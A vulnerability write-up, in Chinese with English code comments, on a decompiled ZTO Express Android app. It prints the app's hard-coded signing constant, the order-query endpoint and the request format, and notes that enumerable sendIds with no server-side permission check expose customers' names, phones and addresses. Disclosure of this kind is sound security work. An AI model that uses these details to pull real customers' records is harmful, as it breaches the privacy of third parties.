漏洞发生在中通快递 Android App 上，用 JEB 反编译一下。问题代码在 com.geenk.activity.MyZTO_MyOrder 这里：
/**
 * Click handler for the order-list query button (decompiler output, reflowed with comments only;
 * the goto/label control flow below is the decompiler's rendering and is not compilable Java).
 *
 * When the network check returns 2, shows a wait dialog, builds a query JSON
 * (sendId, starttime, endtime, pageSize, pageIndex) and starts a worker thread that
 * POSTs a "SEARCH" request, then a "SEARCHBYCODE" request for the returned orderCodes,
 * replaces the local "order_zto" table with the sender details of each order, and finally
 * signals the activity handler with 10 (done), 20 (request failed) or 30 (empty list).
 *
 * Security notes (defender's view of the visible code):
 * - data_digest is MD5(data + a constant string that ships inside every copy of the APK).
 *   Such a digest only proves the caller possesses the app's constant, not who the user is;
 *   the server must bind sendId to the authenticated session instead of trusting the digest.
 * - sendId (ZTOApplication.ACCOUNT_ONLY_ID) is the only account selector in the request.
 * - Full API responses, which the parsing below shows carry sender name, mobile and address,
 *   are written to stdout/logcat via System.out.println.
 *
 * @param v the clicked view (unused)
 */
public void onClick(View v) {
    if(new NetworkUtil().checkNetworkState(MyZTO_MyOrder.this.getParent()) == 2) {
        MyZTO_MyOrder.this.dialogUtil.showWaitDialog("请稍等...");
        JSONObject v2 = new JSONObject();
        try {
            // Original author's note: sendId is enumerable (a seven-digit number).
            v2.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
            v2.put("starttime", "2014-04-28 10:10:10");
            // Bug: "MM" is month-of-year in SimpleDateFormat; minutes are "mm", so the
            // minutes slot of endtime actually receives the month.
            v2.put("endtime", new SimpleDateFormat("yyyy-MM-dd HH:MM:ss").format(new Date()));
            v2.put("pageSize", 10);
            v2.put("pageIndex", 1);
            new Thread() {
                public void run() {
                    String v25; JSONObject v17; Object v11; JSONArray v10; String v5; String v4;
                    try {
                        // val$param_zto is the decompiler's name for the captured query JSON
                        // (presumably v2 above — verify in the original source).
                        // The digest is MD5 over the JSON text plus an app-embedded constant.
                        v4 = String.valueOf(this.val$param_zto.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
                        new MD5();
                        v5 = MD5.encodeByMD5(v4);
                        HashMap v21 = new HashMap();
                        v21.put("data", this.val$param_zto.toString());
                        v21.put("data_digest", v5);
                        v21.put("msg_type", "SEARCH");
                        v21.put("company_id", "APP");
                        // Original author's note: the POST to http://japi.zto.cn/zto/api_utf8/commonOrder
                        // is not checked against the user's permissions, so orderCode values can be obtained.
                        this.this$1.this$0.result = HttpGetPost.httpPost(ZTOApplication.URL_BILL_QUERY, v21);
                        // Logs the raw response (order data) to stdout/logcat.
                        System.out.println("订单申请:" + this.this$1.this$0.result);
                    } catch(Exception v8) {
                        // Swallowed: on failure result keeps its previous value and is still parsed below.
                        v8.printStackTrace();
                    }
                    // Brittle success check: any response containing "true" anywhere is treated as success.
                    if(!this.this$1.this$0.result.contains("true")) {
                        goto label_395;
                    }
                    JSONArray v16 = new JSONArray();
                    try {
                        JSONArray v15 = new JSONObject(this.this$1.this$0.result).getJSONObject("data").getJSONArray("order_list");
                        if(v15.length() <= 0) {
                            goto label_387;
                        }
                        int v9;
                        // Collect every orderCode from the first response for the detail lookup.
                        for(v9 = 0; v9 < v15.length(); ++v9) {
                            v16.put(v15.get(v9).getString("orderCode"));
                        }
                        JSONObject v26 = new JSONObject();
                        v26.put("orderCode", v16);
                        v26.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
                        // Original author's note: secret key leaked (same hard-coded constant as above).
                        v4 = String.valueOf(v26.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
                        new MD5();
                        v5 = MD5.encodeByMD5(v4);
                        HashMap v22 = new HashMap();
                        v22.put("data", v26.toString());
                        v22.put("data_digest", v5);
                        v22.put("msg_type", "SEARCHBYCODE");
                        v22.put("company_id", "APP");
                        try {
                            this.this$1.this$0.detail_result = HttpGetPost.httpPost(ZTOApplication.URL_BILL_QUERY, v22);
                            // Logs the detail response, which the parsing below shows carries
                            // sender name, mobile and address, to stdout/logcat.
                            System.out.println("订单详情数据:" + this.this$1.this$0.detail_result);
                            goto label_148;
                        } catch(IOException v8_1) {
                            try {
                                v8_1.printStackTrace();
                            // label_148 is reached on success and after IOException/ClientProtocolException alike,
                            // so detail_result is parsed even when the request failed.
                            label_148:
                                v10 = new JSONObject(this.this$1.this$0.detail_result).getJSONObject("data").getJSONArray("order_list");
                                if(v10.length() > 0) {
                                    // Clears the local table before re-inserting; the "1", "1" arguments look
                                    // like a where-clause/argument pair — confirm against SQLite.delete's signature.
                                    SQLite.getInstance().delete(this.this$1.this$0.getApplicationContext(), "order_zto", "1", "1");
                                    SQLite.getInstance().closeConn();
                                }
                                v9 = 0;
                            // label_176/label_179 with the "++v9; goto label_176;" below appear to be the
                            // decompiler's rendering of a for-loop over v10; the loop body is the
                            // try/catch blocks that follow the catch clauses.
                            label_176:
                                while(v9 >= v10.length()) {
                                    goto label_179;
                                }
                            } catch(JSONException v7) {
                                goto label_203;
                            }
                        } catch(ClientProtocolException v8_2) {
                            try {
                                v8_2.printStackTrace();
                                goto label_148;
                            } catch(JSONException v7) {
                                goto label_203;
                            }
                        }
                    } catch(JSONException v7) {
                        goto label_203;
                    }
                    // Loop body: one order per iteration.
                    try {
                        v11 = v10.get(v9);
                        v17 = ((JSONObject)v11).getJSONObject("sender");
                        v25 = ((JSONObject)v11).getString("orderCode");
                        goto label_220;
                    } catch(JSONException v7) {
                        try {
                            v7.printStackTrace();
                        // Map the sender object to a local "order_zto" row (personal data: name, mobile, address).
                        label_220:
                            ContentValues v6 = new ContentValues();
                            v6.put("order_num", v25);
                            v6.put("address_label", v17.getString("name"));
                            v6.put("personal_sent", v17.getString("name"));
                            v6.put("phone_num", v17.getString("mobile"));
                            v6.put("area", "");
                            v6.put("address_detail", v17.getString("address"));
                            v6.put("zip_code", "");
                            v6.put("sex", "");
                            v6.put("name_company", "");
                            v6.put("telephone_number", v17.getString("mobile"));
                            v6.put("fax", "");
                            v6.put("website", "");
                            v6.put("email", "");
                            v6.put("QQ", "");
                            v6.put("wangwang", "");
                            v6.put("province_id", "");
                            v6.put("province", v17.getString("prov"));
                            v6.put("city_id", "");
                            v6.put("city", v17.getString("city"));
                            v6.put("district_id", "");
                            v6.put("district", v17.getString("county"));
                            v6.put("time", ((JSONObject)v11).getString("create_date"));
                            try {
                                System.out.println("插入订单个数" + SQLite.getInstance().insert(this.this$1.this$0.getApplicationContext(), "order_zto", null, v6));
                                SQLite.getInstance().closeConn();
                            } catch(Exception v7_1) {
                                try {
                                    v7_1.printStackTrace();
                                } catch(JSONException v7) {
                                    goto label_203;
                                }
                            }
                        } catch(JSONException v7) {
                            goto label_203;
                        }
                    }
                    ++v9;
                    goto label_176;
                    try {
                    // All orders stored: notify the UI thread (10).
                    label_179:
                        this.this$1.this$0.handler.sendEmptyMessage(10);
                        return;
                    // Empty order list (30).
                    label_387:
                        this.this$1.this$0.handler.sendEmptyMessage(30);
                    } catch(JSONException v7) {
                    // Shared JSON-error exit: only a stack trace, no handler message.
                    label_203:
                        v7.printStackTrace();
                    }
                    return;
                    // Response did not contain "true" (20).
                label_395:
                    this.this$1.this$0.handler.sendEmptyMessage(20);
                }
            }.start();
        } catch(Exception v0) {
            v0.printStackTrace();
        }
    }
}
});
// The statements below belong to the enclosing method, whose opening lies above this excerpt.
this.tittle = this.findViewById(2131099684);
this.tittle.setText("我的订单");
this.lv_order = this.findViewById(2131099686);
MyZTO_MyOrder.list = new ArrayList();
MyZTO_MyOrder.adapter = new OrderManagerAdapter(((Context)this), MyZTO_MyOrder.list);
this.lv_order.setOnItemClickListener(new AdapterView$OnItemClickListener() {
    // Opens the order-detail activity for the tapped row, passing its list index.
    public void onItemClick(AdapterView arg6, View arg1, int arg2, long arg3) {
        Intent v0 = new Intent(MyZTO_MyOrder.this, MyZTO_Order_Detail.class);
        v0.putExtra("index", arg2);
        // The activity id "UpdatePassword" does not match the detail screen being started;
        // likely copy-paste, harmless only if the id is never reused — worth confirming.
        MyZTOActivity.group.replaceView(MyZTOActivity.group.getLocalActivityManager().startActivity("UpdatePassword", v0.addFlags(67108864)).getDecorView());
    }
});
this.lv_order.setAdapter(MyZTO_MyOrder.adapter);
// Background load of the list data; result is delivered to the handler as message 1.
new Thread() {
    public void run() {
        List v0 = MyZTO_MyOrder.this.getData();
        Message v1 = new Message();
        v1.what = 1;
        v1.obj = v0;
        MyZTO_MyOrder.this.handler.sendMessage(v1);
    }
}.start();
}